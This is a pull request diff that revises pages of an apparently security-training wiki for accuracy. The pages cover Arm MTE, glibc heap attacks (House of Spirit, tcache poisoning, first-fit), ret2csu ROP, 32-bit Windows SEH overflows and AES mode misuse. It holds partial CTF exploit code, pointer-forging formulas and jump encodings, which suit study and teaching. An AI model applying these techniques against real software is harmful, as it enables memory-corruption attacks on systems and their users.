### PR TITLE
Audit references and technical accuracy across 50 pages

### DIFF
--- a/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
+++ b/src/binary-exploitation/common-binary-protections-and-bypasses/memory-tagging-extension-mte.md
@@ -4,21 +4,21 @@
 
 ## Basic Information
 
-**Memory Tagging Extension (MTE)** is designed to enhance software reliability and security by **detecting and preventing memory-related errors**, such as buffer overflows and use-after-free vulnerabilities. MTE, as part of the **ARM** architecture, provides a mechanism to attach a **small tag to each memory allocation** and a **corresponding tag to each pointer** referencing that memory. This approach allows for the detection of illegal memory accesses at runtime, significantly reducing the risk of exploiting such vulnerabilities for executing arbitrary code.
+**Memory Tagging Extension (MTE)** is designed to improve software reliability and security by **detecting memory-safety violations**, such as some buffer overflows and use-after-free accesses. MTE, as part of the **Arm AArch64** architecture, attaches a **small allocation tag to each tagged memory granule** and a **logical tag to pointers** that reference it. A mismatch can raise a fault, depending on the configured checking mode; MTE is therefore a probabilistic detection and mitigation mechanism, not a guarantee that every memory error is prevented.<sup>[[1]](#references)</sup>
 
 ### **How Memory Tagging Extension Works**
 
-MTE operates by **dividing memory into small, fixed-size blocks, with each block assigned a tag,** typically a few bits in size.
+MTE operates on **16-byte allocation granules**, each of which can have a 4-bit allocation tag.<sup>[[1]](#references)</sup>
 
 When a pointer is created to point to that memory, it gets the same tag. This tag is stored in the **unused bits of a memory pointer**, effectively linking the pointer to its corresponding memory block.
 
 <figure><img src="../../images/image (1202).png" alt=""><figcaption><p><a href="https://www.youtube.com/watch?v=UwMt0e_dC_Q">https://www.youtube.com/watch?v=UwMt0e_dC_Q</a></p></figcaption></figure>
 
-When a program accesses memory through a pointer, the MTE hardware checks that the **pointer's tag matches the memory block's tag**. If the tags **do not match**, it indicates an **illegal memory access.**
+When a program accesses tagged memory through a pointer, the MTE hardware checks that the **pointer's logical tag matches the allocation tag**. A mismatch is reported according to the active synchronous, asynchronous, or asymmetric fault mode.<sup>[[1]](#references)</sup>
 
 ### MTE Pointer Tags
 
-Tags inside a pointer are stored in 4 bits inside the top byte:
+Pointer tags use four bits in the top byte of an AArch64 address:<sup>[[1]](#references)</sup>
 
 <figure><img src="../../images/image (1203).png" alt=""><figcaption><p><a href="https://www.youtube.com/watch?v=UwMt0e_dC_Q">https://www.youtube.com/watch?v=UwMt0e_dC_Q</a></p></figcaption></figure>
 
@@ -26,9 +26,9 @@ Therefore, this allows up to **16 different tag values**.
 
 ### MTE Memory Tags
 
-Every **16B of physical memory** have a corresponding **memory tag**.
+Every tagged **16-byte allocation granule** has a corresponding allocation tag.
 
-The memory tags are stored in a **dedicated RAM region** (not accessible for normal usage). Having 4-bit tags for every 16B of memory costs roughly **3% of RAM**.
+Allocation tags are held in implementation-defined tag storage that normal loads and stores cannot access. Four tag bits per 16 data bytes represent a raw storage ratio of **3.125%**, although the physical implementation and effective overhead are platform-specific.<sup>[[1]](#references)</sup>
 
 ARM introduces the following instructions to manipulate these tags in the dedicated RAM memory:
 
@@ -91,17 +91,16 @@ On Android, stack tagging is not automatic for arbitrary native code: if a lab o
 
 ## Implementation & Detection Examples
 
-Called Hardware Tag-Based KASAN, MTE-based KASAN or in-kernel MTE.\
-The kernel allocators (like `kmalloc`) will **call this module** which will prepare the tag to use (randomly) and attach it to the allocated kernel memory and to the returned pointer.
+Linux calls its MTE-backed kernel memory-safety detector **Hardware Tag-Based KASAN**. Supported kernel allocators such as `kmalloc` assign an allocation tag to the memory and return a pointer carrying the corresponding logical tag.<sup>[[5]](#references)</sup>
 
-Note that it'll **only mark enough memory granules** (16B each) for the requested size. So if the requested size was 35 and a slab of 60B was given, it'll mark the first `16*3 = 48B` with this tag and the **rest** will usually be **marked** with a special **invalid tag** (commonly `0xE` in current Linux KASAN/MTE discussions).
+It **only tags enough 16-byte granules** to cover the requested object. For example, a 35-byte object occupies three granules (`16*3 = 48` bytes); allocator metadata or padding beyond the object can use a different poison/freed tag according to the allocator and KASAN implementation.<sup>[[5]](#references)</sup>
 
 A very important nuance is that **kernel and userspace do not expose exactly the same behavior**:
 
-- In the **Linux kernel**, the current implementation has important special cases around **tag `0xF`** (`TCMA1` / "match-all" style behavior in several paths), so forged pointers carrying `0xF` are especially interesting during kernel exploitation.
+- In **Hardware Tag-Based KASAN**, the full pointer tag byte `0xFF` is a match-all tag and `0xFE` is reserved for freed memory. Their low nibbles are `0xF` and `0xE`, but these are KASAN conventions rather than universal MTE semantics.<sup>[[5]](#references)</sup>
 - In **normal userspace Linux MTE**, there is **no general-purpose match-all logical tag** you can rely on from an unprivileged process.
 
-Therefore, if the implementation reserves `0xE` and `0xF`, there are effectively **14 practical tag values**, so a blind tag re-use or reallocation collision is around **`1/14` (~7.1%)** per try instead of being a deterministic bypass.
+Consequently, the probability of a blind tag collision is **`1/N`**, where `N` is the number of tags the allocator actually chooses. It is `1/14` (about 7.1%) only for a policy that chooses uniformly among 14 usable values; permitted userspace tags and allocator policies can differ.<sup>[[1]](#references)[[5]](#references)</sup>
 
 If the kernel accesses the **invalid-tag granule**, the **mismatch** will be **detected**. If it accesses another memory location and the **memory has a different tag** (or the invalid tag) the mismatch will also be detected. If the attacker is lucky and the memory is using the same tag, it won't be detected.
 
@@ -154,6 +153,6 @@ The paper demonstrates this against **Google Chrome** and the **Linux kernel**.<
 - [2] [MTE As Implemented, Part 2: Mitigation Case Studies](https://projectzero.google/2023/08/mte-as-implemented-part-2-mitigation.html)
 - [3] [TikTag: Breaking ARM's Memory Tagging Extension with Speculative Execution](https://arxiv.org/abs/2406.08719)
 - [4] [Sticky Tags: Efficient and Deterministic Spatial Memory Error Mitigation using Persistent Memory Tags](https://www.vusec.net/projects/stickytags/)
+- [5] [Linux kernel documentation - Kernel Address Sanitizer (KASAN)](https://docs.kernel.org/dev-tools/kasan.html)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/binary-exploitation/libc-heap/house-of-spirit.md
+++ b/src/binary-exploitation/libc-heap/house-of-spirit.md
@@ -16,7 +16,7 @@
 #include <string.h>
 #include <stdio.h>
 
-// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit
+// Adapted with extra diagnostic output from the House of Spirit example in reference 1.
 
 struct fast_chunk {
   size_t prev_size;
@@ -57,19 +57,21 @@ int main() {
 
 </details>
 
+The example above demonstrates the classic fastbin variant.<sup>[[1]](#references)</sup>
+
 ### Goal
 
-- Be able to add into the tcache / fast bin an address so later it's possible to allocate it
+- Insert an attacker-chosen address into a tcache bin or fastbin so that a later `malloc()` returns memory overlapping that address.
 
 ### Requirements
 
 - This attack requires an attacker to be able to create a couple of fake fast chunks indicating correctly the size value of it and then to be able to free the first fake chunk so it gets into the bin.
-- With **tcache (glibc ≥2.26)** the attack is even simpler: only one fake chunk is needed (no next-chunk size check is performed on the tcache path) as long as the fake chunk is 0x10-aligned and its size field falls in a valid tcache bin (0x20-0x410 on x64).
+- With **tcache (glibc ≥2.26)** the attack is simpler: only one fake chunk is needed because the tcache path does not perform the fastbin next-chunk size check. On the common 64-bit glibc configurations demonstrated here, the fake chunk must be 16-byte aligned and use a size accepted by an enabled tcache bin; the traditional default small-bin range extends through a `0x410` chunk size, although tunables and newer allocator versions can change tcache coverage.<sup>[[2]](#references)</sup>
 
 ### Attack
 
-- Create fake chunks that bypasses security checks: you will need 2 fake chunks basically indicating in the correct positions the correct sizes
-- Somehow manage to free the first fake chunk so it gets into the fast or tcache bin and then it's allocate it to overwrite that address
+- Create fake chunks that satisfy the relevant allocator checks. The classic fastbin route needs a plausible next chunk as well as a valid current size.
+- Redirect a pointer passed to `free()` to the fake chunk. A subsequent allocation of the matching size can then overlap the chosen address.
 
 **The code from** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house_of_spirit/house_spirit_exp/index.html) **is great to understand the attack.** Although this schema from the code summarises it pretty good:<sup>[[3]](#references)</sup>
 
@@ -145,4 +147,3 @@ void *q = malloc(0x30);      // returns stack address fake+2
 - [5] [Gloater. HTB Cyber Apocalypse CTF 2024](https://7rocky.github.io/en/ctf/other/htb-cyber-apocalypse/gloater/)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/binary-exploitation/libc-heap/tcache-bin-attack.md
+++ b/src/binary-exploitation/libc-heap/tcache-bin-attack.md
@@ -26,7 +26,7 @@ Historically, this was introduced together with tcache in **glibc 2.26** and was
 - **glibc 2.32+** added **safe-linking** to singly-linked allocator lists (`tcache` and `fastbins`). The stored `next` pointer is no longer raw, but mangled as:
 
 ```c
-stored_next = target ^ (chunk_addr >> 12)
+stored_next = target ^ (address_of_next_field >> 12)
 ```
 
   Therefore, a modern tcache poisoning usually needs either:
@@ -69,7 +69,7 @@ So, after freeing a chunk, the first qword of its user data becomes the singly-l
 For glibc 2.32+ the forged value is typically:
 
 ```c
-fake_next = target ^ (victim_chunk_addr >> 12)
+fake_next = target ^ (address_of_victim_next_field >> 12)
 ```
 
 If the returned pointer is not aligned to the allocator expectations, `malloc()` will usually abort before you get control.
@@ -98,7 +98,7 @@ If you can reach the `tcache_perthread_struct` itself, poisoning the **metadata*
 Useful modern variants to recognise:
 
 - **House of Water**: turns a UAF/overflow into **control of `tcache_perthread_struct`** and is a good modern answer when safe-linking makes direct freelist poisoning awkward.
-- **Safe-link double protect**: if a primitive lets an already protected pointer go through `PROTECT_PTR` again, the protection can effectively cancel out (`(ptr ^ key) ^ key = ptr`), giving a practical **leakless or low-leak safe-linking bypass**.
+- **Safe-link double protect**: selected allocator paths can protect an already protected value again. The technique arranges the pointer positions so the relevant XOR masks cancel or transform into the required value; it is not enough to XOR any protected pointer twice, because `PROTECT_PTR` derives its mask from the storage address.<sup>[[2]](#references)</sup>
 - **Tcache relative write**: if you can first corrupt allocator parameters such as `mp_.tcache_bins`, glibc may compute oversized `tc_idx` values and write **tcache metadata out of bounds** into later heap memory.
 - **glibc 2.42 metadata hijacking**: recent how2heap notes show that `tcache_perthread_struct` may be initialized later and not necessarily be the first heap allocation anymore, so an overflow/UAF on a large earlier chunk can directly overwrite `entries[]` and make the next small `malloc()` return an attacker-chosen address.<sup>[[2]](#references)</sup>
 
@@ -136,7 +136,7 @@ On glibc 2.32+ the core problem is not "how do I overwrite `next`?" but "how do 
   - **Tcache attack**: The binary is vulnerable a 1B heap overflow. This will be abuse to change the **size header** of an allocated chunk making it bigger. Then, this chunk will be **freed**, adding it to the tcache of chunks of the fake size. Then, we will allocate a chunk with the faked size, and the previous chunk will be **returned knowing that this chunk was actually smaller** and this grants up the opportunity to **overwrite the next chunk in memory**.\
     We will abuse this to **overwrite the next chunk's FD pointer** to point to a sensitive target, so then later allocations return a controlled pointer and give an arbitrary write primitive.
 - CTF [https://guyinatuxedo.github.io/29-tcache/plaid19_cpp/index.html](https://guyinatuxedo.github.io/29-tcache/plaid19_cpp/index.html)<sup>[[6]](#references)</sup>
-  - **Libc info leak**: There is a use after free and a double free. In this writeup the author leaked an address of libc by readnig the address of a chunk placed in a small bin (like leaking it from the unsorted bin but from the small one)
+  - **Libc info leak**: There is a use-after-free and a double-free. The write-up leaks a libc address by reading the linkage of a chunk placed in a small bin, similarly to an unsorted-bin leak.
   - **Tcache attack**: A Tcache is performed via a **double free**. The same chunk is freed twice, so inside the Tcache the chunk will point to itself. Then, it's allocated, its FD pointer is modified to point to the **free hook** and then it's allocated again so the next chunk in the list is going to be in the free hook. Then, this is also allocated and it's possible to write a the address of `system` here so when a malloc containing `"/bin/sh"` is freed we get a shell.
   - This is still a good **historical** example, but remember that the easy version of this attack does **not** generalise to glibc `2.32+` / `2.34+` without accounting for safe-linking and hook removal.
 - CTF [https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps0/index.html](https://guyinatuxedo.github.io/44-more_tcache/csaw19_popping_caps0/index.html)<sup>[[7]](#references)</sup>
@@ -179,4 +179,3 @@ On glibc 2.32+ the core problem is not "how do I overwrite `next`?" but "how do 
 - [12] [high frequency troubles. picoCTF 2024](https://pwn2ooown.tech/ctf/writeup/2024/06/10/picoCTF-HFT)
 
 {{#include ../../banners/hacktricks-training.md}}
-

--- a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md
+++ b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md
@@ -4,18 +4,18 @@
 
 ## **First Fit**
 
-When you free memory in a program using glibc, different "bins" are used to manage the memory chunks. Here's a simplified explanation of two common scenarios: unsorted bins and fastbins.
+When a program frees memory through glibc, the allocator may place chunks in several caches or bins. The following unsorted-bin and fastbin behavior describes the classic allocator model; on glibc 2.26 and later, the per-thread tcache usually intercepts eligible chunks first.<sup>[[1]](#references)[[4]](#references)</sup>
 
 ### Unsorted Bins
 
-When you free a memory chunk that's not a fast chunk, it goes to the unsorted bin. This bin acts like a list where new freed chunks are added to the front (the "head"). When you request a new chunk of memory, the allocator looks at the unsorted bin from the back (the "tail") to find a chunk that's big enough. If a chunk from the unsorted bin is bigger than what you need, it gets split, with the front part being returned and the remaining part staying in the bin.
+With tcache bypassed or disabled, a freed arena chunk that is not kept in a fastbin is commonly coalesced and placed in the unsorted bin. New entries are linked at the front, while allocation scans from the back. A sufficiently large chunk can be split, returning its front portion and leaving a remainder for subsequent processing. Top-chunk consolidation and other bins are important exceptions.<sup>[[4]](#references)</sup>
 
 Example:
 
-- You allocate 300 bytes (`a`), then 250 bytes (`b`), then free `a` and request again 250 bytes (`c`).
+- In a legacy/no-tcache setup, allocate 300 bytes (`a`), then 250 bytes (`b`), free `a`, and request 250 bytes (`c`).
 - When you free `a`, it goes to the unsorted bin.
 - If you then request 250 bytes again, the allocator finds `a` at the tail and splits it, returning the part that fits your request and keeping the rest in the bin.
-  - `c` will be pointing to the previous `a` and filled with the `a`'s contents.
+  - `c` can point into the previous `a` region and retain any bytes that allocation did not overwrite.
 
 ```c
 char *a = malloc(300);
@@ -24,9 +24,11 @@ free(a);
 char *c = malloc(250);
 ```
 
+On default modern glibc, `a` is normally cached in its own tcache size class, while the 250-byte request belongs to another size class; this exact example therefore does **not** demonstrate unsorted-bin splitting unless tcache is disabled/bypassed or the sizes are adjusted.
+
 ### Fastbins
 
-Fastbins are used for small memory chunks. Unlike unsorted bins, fastbins add new chunks to the head, creating a last-in-first-out (LIFO) behavior. If you request a small chunk of memory, the allocator will pull from the fastbin's head.
+Fastbins cache selected small chunks in last-in-first-out (LIFO) singly linked lists. On tcache-enabled glibc, eligible frees first enter tcache until its matching bin is full; only then does the following sequence exhibit fastbin LIFO reuse.<sup>[[4]](#references)</sup>
 
 Example:
 
@@ -44,6 +46,8 @@ b = malloc(20);   // c
 c = malloc(20);   // b
 d = malloc(20);   // a
 ```
+
+To observe fastbins rather than tcache in this example, disable tcache or first fill the relevant tcache bin.
 
 ---
 ### Modern glibc considerations (tcache >= 2.26)
@@ -146,6 +150,6 @@ If what you really control is the unsorted-bin metadata rather than the recycled
 - [1] [GNU C Library 2.42 release announcement (tcache large-block caching)](https://lists.gnu.org/archive/html/info-gnu/2025-07/msg00011.html)
 - [2] [AngstromCTF 2024 Pwnable write-up (Heapify)](https://hackmd.io/@aneii11/H1S2snV40)
 - [3] [Heap exploitation, glibc internals and nifty tricks (HITCON CTF 2024 setjmp)](https://blog.quarkslab.com/heap-exploitation-glibc-internals-and-nifty-tricks.html)
+- [4] [glibc `malloc.c` allocator implementation](https://sourceware.org/git/?p=glibc.git;a=blob;f=malloc/malloc.c;hb=HEAD)
 
 {{#include ../../../banners/hacktricks-training.md}}
-

--- a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md
+++ b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md
@@ -1,14 +1,12 @@
-# Ret2csu
+# ret2csu
 
 {{#include ../../banners/hacktricks-training.md}}
 
-##
+## Basic Information
 
-## [https://www.scs.stanford.edu/brop/bittau-brop.pdf](https://www.scs.stanford.edu/brop/bittau-brop.pdf)Basic Information
+**ret2csu** is a ROP technique for x86-64 ELF binaries that reuses instruction sequences traditionally linked into `__libc_csu_init` when ordinary register-pop gadgets are missing. The exact sequences and even the presence of that symbol depend on the compiler, C runtime, and startup objects, so always verify the target disassembly.<sup>[[1]](#references)[[4]](#references)</sup>
 
-**ret2csu** is a hacking technique used when you're trying to take control of a program but can't find the **gadgets** you usually use to manipulate the program's behavior.
-
-When a program uses certain libraries (like libc), it has some built-in functions for managing how different pieces of the program talk to each other. Among these functions are some hidden gems that can act as our missing gadgets, especially one called `__libc_csu_init`.
+The classic pair provides a six-register pop sequence followed by register moves and an indirect call. Together they can set `rdx`, `rsi`, and the low 32 bits of `rdi`, then call through a pointer stored in memory.
 
 ### The Magic Gadgets in \_\_libc_csu_init
 
@@ -30,7 +28,7 @@ This gadget allows us to control these registers by popping values off the stack
 
 2. The second sequence uses the values we set up to do a couple of things:
    - **Move specific values into other registers**, making them ready for us to use as parameters in functions.
-   - **Perform a call to a location** determined by adding together the values in r15 and rbx, then multiplying rbx by 8.
+   - **Perform an indirect call** through the pointer at `r12 + rbx*8`.
 
 ```armasm
 mov rdx, r15;
@@ -53,7 +51,7 @@ jnz <func>
 ret
 ```
 
-The conditions will be:
+The conditions for the classic sequence are:
 
 - `[r12 + rbx*8]` must be pointing to an address storing a callable function (if no idea and no pie, you can just use `_init` func):
   - If \_init is at `0x400560`, use GEF to search for a pointer in memory to it and make `[r12 + rbx*8]` be the address with the pointer to \_init:<sup>[[4]](#references)</sup>
@@ -68,8 +66,9 @@ gef➤  search-pattern 0x400560
   0x600e38 - 0x600e44  →   "\x60\x05\x40[...]"
 ```
 
-- `rbp` and `rbx` must have the same value to avoid the jump
-- There are some omitted pops you need to take into account
+- Set the initial `rbp` to **`rbx + 1`** so that the post-call `add rbx, 1` makes `rbx == rbp` and avoids the loop.
+- Account for the usually omitted `add rsp, 8`, six pops, and final `ret` when laying out the remainder of the chain.
+- `mov edi, r13d` zero-extends only a 32-bit value into `rdi`; this classic gadget cannot directly supply an arbitrary 64-bit first argument.
 
 ## RDI and RSI
 
@@ -92,8 +91,10 @@ Imagine you want to make a syscall or call a function like `write()` but need sp
 
 Here's where **ret2csu** comes into play:
 
-1. **Set Up the Registers**: Use the first magic gadget to pop values off the stack and into rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx), and r15.
-2. **Use the Second Gadget**: With those registers set, you use the second gadget. This lets you move your chosen values into `rdx` and `rsi` (from r14 and r13, respectively), readying parameters for a function call. Moreover, by controlling `r15` and `rbx`, you can make the program call a function located at the address you calculate and place into `[r15 + rbx*8]`.
+1. **Set up the registers** with the pop gadget.
+2. **Use the call gadget** to move the saved registers into argument registers and call through an attacker-selected pointer.
+
+Two common instruction layouts use different saved registers. The classic gadget shown above uses `r15 → rdx`, `r14 → rsi`, `r13d → edi`, and calls `[r12 + rbx*8]`. The ROP Emporium challenge used below has a shifted layout: `r14 → rdx`, `r13 → rsi`, `r12d → edi`, and calls `[r15 + rbx*8]`. Never copy register comments without checking the binary.<sup>[[2]](#references)[[4]](#references)</sup>
 
 You have an [**example using this technique and explaining it here**](https://ir0nstone.gitbook.io/notes/types/stack/ret2csu/exploitation), and this is the final exploit it used:<sup>[[2]](#references)</sup>
 
@@ -102,12 +103,13 @@ from pwn import *
 
 elf = context.binary = ELF('./vuln')
 p = process()
+rop = ROP(elf)
 
 POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
 REG_CALL = 0x00401208  # rdx, rsi, edi, call [r15 + rbx*8]
 RW_LOC = 0x00404028
 
-rop.raw('A' * 40)
+rop.raw(b'A' * 40)
 rop.gets(RW_LOC)
 rop.raw(POP_CHAIN)
 rop.raw(0)                      # r12
@@ -122,11 +124,11 @@ print(p.recvline())                        # should receive "Awesome work!"
 ```
 
 > [!WARNING]
-> Note that the previous exploit isn't meant to do a **`RCE`**, it's meant to just call a function called **`win`** (taking the address of `win` from stdin calling gets in the ROP chain and storing it in r15) with a third argument with the value `0xdeadbeefcafed00d`.
+> The previous exploit is not intended to produce general **RCE**. It calls the challenge's `win` function: `gets` writes the function address to `RW_LOC`, `r15` points to that memory, and the indirect call dereferences it. The third argument in `rdx` is `0xdeadbeefcafed00d`.
 
 ### Bypassing the call and reaching ret
 
-The following exploit was extracted [**from this page**](https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html) where the **ret2csu** is used but instead of using the call, it's **bypassing the comparisons and reaching the `ret`** after the call:<sup>[[3]](#references)[[4]](#references)</sup>
+The following exploit was extracted [**from this page**](https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html) where the **ret2csu** is used but instead of using the call, it's **bypassing the comparisons and reaching the `ret`** after the call:<sup>[[3]](#references)</sup>
 
 ```python
 # Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
@@ -147,7 +149,7 @@ ret2win = p64(0x4007b1)
 initPtr = p64(0x600e38)
 
 # Padding from start of input to saved return address
-payload = "0"*0x28
+payload = b"0"*0x28
 
 # Our first gadget, and the values to be popped from the stack
 
@@ -186,7 +188,7 @@ Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protec
 
 - [1] [Hacking Blind (original BROP paper)](https://www.scs.stanford.edu/brop/bittau-brop.pdf)
 - [2] [ret2csu exploitation - ir0nstone notes](https://ir0nstone.gitbook.io/notes/types/stack/ret2csu/exploitation)
-- [3] [ROP Emporium - ret2csu (RootNetSec)](https://www.rootnetsec.com/ropemporium-ret2csu/)
-- [4] [ropemporium_ret2csu - Nightmare (guyinatuxedo)](https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html)
+- [3] [ropemporium_ret2csu - Nightmare (guyinatuxedo)](https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html)
+- [4] [ROP Emporium - ret2csu challenge](https://ropemporium.com/challenge/ret2csu.html)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/binary-exploitation/stack-overflow/windows-seh-overflow.md
+++ b/src/binary-exploitation/stack-overflow/windows-seh-overflow.md
@@ -2,17 +2,17 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-SEH-based exploitation is a classic x86 Windows technique that abuses the Structured Exception Handler chain stored on the stack. When a stack buffer overflow overwrites the two 4-byte fields
+SEH-based exploitation is a classic 32-bit Windows technique that abuses the Structured Exception Handler chain stored on the stack. When a stack buffer overflow overwrites the two four-byte fields:
 
 - nSEH: pointer to the next SEH record, and
 - SEH: pointer to the exception handler function
 
 an attacker can take control of execution by:
 
-1) Setting SEH to the address of a POP POP RET gadget in a non-protected module, so that when an exception is dispatched the gadget returns into attacker-controlled bytes, and
-2) Using nSEH to redirect execution (typically a short jump) back into the large overflowing buffer where shellcode resides.
+1. Set SEH to the address of a POP POP RET gadget in a module that is compatible with this technique, so exception dispatch returns into attacker-controlled bytes.
+2. Use nSEH to redirect execution, typically with a short jump, into the overflowing buffer where the next stage resides.
 
-This technique is specific to 32-bit processes (x86). On modern systems, prefer a module without SafeSEH and ASLR for the gadget. Bad characters often include 0x00, 0x0a, 0x0d (NUL/CR/LF) due to C-strings and HTTP parsing.<sup>[[3]](#references)</sup>
+This technique is specific to 32-bit processes (x86). Use a gadget from a module without SafeSEH and, for a fixed address, without ASLR. SEHOP can also reject a corrupted exception chain, while DEP requires a separate code-reuse or protection-changing stage before injected data can execute. Bytes such as `0x00`, `0x0a`, and `0x0d` (NUL/CR/LF) are common bad-character candidates for C-string and HTTP parsers, but they must be tested against the actual input path.<sup>[[3]](#references)[[5]](#references)</sup>
 
 ---
 
@@ -52,14 +52,14 @@ Pick an address that contains no badchars when written little-endian (e.g., `p32
 
 ## Jump-back technique (short + near jmp)
 
-nSEH is only 4 bytes, which fits at most a 2-byte short jump (`EB xx`) plus padding. If you must jump back hundreds of bytes to reach your buffer start, use a 5-byte near jump placed right before nSEH and chain into it with a short jump from nSEH.
+nSEH is only four bytes, which fits a two-byte short jump (`EB xx`) plus padding. If the target is hundreds of bytes away, place a five-byte near jump immediately before nSEH and use the short jump to reach it.
 
 With nasmshell:
 
 ```text
 nasm> jmp -660           ; too far for short; near jmp is 5 bytes
 E967FDFFFF
-nasm> jmp short -8       ; 2-byte short jmp fits in nSEH (with 2 bytes padding)
+nasm> jmp short -8       ; target is 8 bytes before nSEH; encoded displacement is -10
 EBF6
 nasm> jmp -652           ; 8 bytes closer (to account for short-jmp hop)
 E96FFDFFFF
@@ -151,7 +151,7 @@ p.close()
 
 ## Notes and caveats
 
-- Only applies to x86 processes. x64 uses a different SEH scheme and SEH-based exploitation is generally not viable.
+- This nSEH/SEH stack-record technique applies to x86 processes. x64 uses table-based exception metadata rather than the same stack-linked registration records.
 - Prefer gadgets in modules without SafeSEH and ASLR; otherwise, find an unprotected module loaded into the process.
 - Service watchdogs that automatically restart on crash can make iterative exploit development easier.
 
@@ -159,7 +159,8 @@ p.close()
 
 - [1] [HTB: Rainbow – SEH overflow to RCE over HTTP (0xdf)](https://0xdf.gitlab.io/2025/08/07/htb-rainbow.html)
 - [2] [ERC.Xdbg – Exploit Research Plugin for x64dbg (SEH search)](https://github.com/Andy53/ERC.Xdbg)
-- [3] [Corelan – Exploit writing tutorial part 7 (SEH)](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-7-unicode-0day-buffer-overflow-seh-and-venetian-shellcode/)
+- [3] [Corelan - Exploit writing tutorial part 3: SEH-based exploits](https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/)
 - [4] [Mona.py – WinDbg/Immunity helper](https://github.com/corelan/mona)
+- [5] [Microsoft Learn - `/SAFESEH` image has safe exception handlers](https://learn.microsoft.com/en-us/cpp/build/reference/safeseh-image-has-safe-exception-handlers)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/binary-exploitation/stack-overflow/windows-seh-overflow.md
+++ b/src/binary-exploitation/stack-overflow/windows-seh-overflow.md
@@ -154,6 +154,7 @@ p.close()
 - This nSEH/SEH stack-record technique applies to x86 processes. x64 uses table-based exception metadata rather than the same stack-linked registration records.
 - Prefer gadgets in modules without SafeSEH and ASLR; otherwise, find an unprotected module loaded into the process.
 - Service watchdogs that automatically restart on crash can make iterative exploit development easier.
+- When the vulnerable input is transformed into UTF-16/Unicode, ordinary byte-oriented jumps and shellcode may no longer survive. Venetian alignment and Unicode-compatible encoders are specialized extensions of the SEH workflow; Corelan's dedicated tutorial retains the full worked technique.<sup>[[6]](#references)</sup>
 
 ## References
 
@@ -162,5 +163,6 @@ p.close()
 - [3] [Corelan - Exploit writing tutorial part 3: SEH-based exploits](https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/)
 - [4] [Mona.py – WinDbg/Immunity helper](https://github.com/corelan/mona)
 - [5] [Microsoft Learn - `/SAFESEH` image has safe exception handlers](https://learn.microsoft.com/en-us/cpp/build/reference/safeseh-image-has-safe-exception-handlers)
+- [6] [Corelan - Exploit writing tutorial part 7: Unicode and Venetian shellcode](https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/)
 
 {{#include ../../banners/hacktricks-training.md}}

--- a/src/crypto/symmetric/README.md
+++ b/src/crypto/symmetric/README.md
@@ -11,6 +11,8 @@
 
 ## AES modes and misuse
 
+NIST specifies the ECB, CBC, and CTR confidentiality modes in SP 800-38A and GCM authenticated encryption in SP 800-38D.<sup>[[2]](#references)[[3]](#references)</sup>
+
 ### ECB: Electronic Codebook
 
 ECB leaks patterns: equal plaintext blocks → equal ciphertext blocks. That enables:
@@ -22,7 +24,7 @@ If you can control plaintext and observe ciphertext (or cookies), try making rep
 
 ### CBC: Cipher Block Chaining
 
-- CBC is **malleable**: flipping bits in `C[i-1]` flips predictable bits in `P[i]`.
+- CBC is **malleable**: flipping bits in `C[i-1]` flips predictable bits in `P[i]`, while also garbling `P[i-1]`. Modifying the IV targets the first plaintext block without garbling an earlier plaintext block.
 - If the system exposes valid padding vs invalid padding, you may have a **padding oracle**.
 
 ### CTR
@@ -62,13 +64,13 @@ GCM also breaks badly under nonce reuse. If the same key+nonce is used more than
 Operational guidance:
 
 - Treat "nonce reuse" in AEAD as a critical vulnerability.
-- Misuse-resistant AEADs (e.g., GCM-SIV) reduce nonce-misuse fallout but still require unique nonces/IVs.
+- Misuse-resistant AEADs such as AES-GCM-SIV reduce nonce-reuse fallout. Callers should still provide unique nonces as required by the construction's interface; accidental reuse has bounded consequences compared with ordinary GCM.<sup>[[3]](#references)[[4]](#references)</sup>
 - If you have multiple ciphertexts under the same nonce, start by checking `C1 XOR C2 = P1 XOR P2` style relations.
 
 ### Tools
 
-- CyberChef for quick experiments: https://gchq.github.io/CyberChef/
-- Python: `pycryptodome` for scripting
+- [CyberChef](https://gchq.github.io/CyberChef/) for quick experiments.<sup>[[8]](#references)</sup>
+- Python's [PyCryptodome](https://www.pycryptodome.org/) package for scripting.<sup>[[9]](#references)</sup>
 
 ## ECB exploitation patterns
 
@@ -102,10 +104,10 @@ If the backend tolerates padding/extra spaces (`admin` vs `admin    `), you can:
 
 ### What it is
 
-In CBC mode, if the server reveals (directly or indirectly) whether decrypted plaintext has **valid PKCS#7 padding**, you can often:
+In CBC mode, if the server reveals (directly or indirectly) whether decrypted plaintext has **valid PKCS#7 padding**, you can often:<sup>[[7]](#references)</sup>
 
 - Decrypt ciphertext without the key
-- Encrypt chosen plaintext (forge ciphertext)
+- Construct a ciphertext that decrypts to chosen plaintext when you can submit crafted preceding blocks or IVs and the application accepts the resulting validly padded message
 
 The oracle can be:
 
@@ -152,7 +154,7 @@ This is not a break of confidentiality by itself, but it is a common privilege-e
 
 ## CBC-MAC
 
